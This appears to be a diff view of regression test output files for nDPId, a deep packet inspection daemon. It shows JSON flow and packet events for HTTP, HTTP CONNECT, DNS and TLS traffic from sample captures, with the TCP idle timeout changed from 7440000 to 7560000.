00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"}
00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}}
00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1381844050222,"flow_last_seen":1381844050222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1381844050222,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"}
00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}}
00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-data-len":18376,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1381844057320}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 33/33

26
test/results/http_connect.pcap.out
View File

@@ -1,24 +1,24 @@
00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"http_connect.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1631454722864}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722864,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722864,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722864,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722864,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1631454722867,"pkt":"AAwpGN5XAAwpTU5kCABFAABDZMpAAEARUfvAqAGSwKgBArqXADUAL4Ql9bcBAAABAAAAAAABBmFwYWNoZQNvcmcAAAEAAQAAKQIAAAAAAAAA"}
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1631454722867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1631454722867,"pkt":"AAwpTU5kAAwpGN5XCABFAABTqZtAAEARDRrAqAECwKgBkgA1upcAP92U9beBgAABAAEAAAABBmFwYWNoZQNvcmcAAAEAAcAMAAEAAQAAA0oABJdlAoQAACkE0AAAAAAAAA=="}
00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"}
00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"}
00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
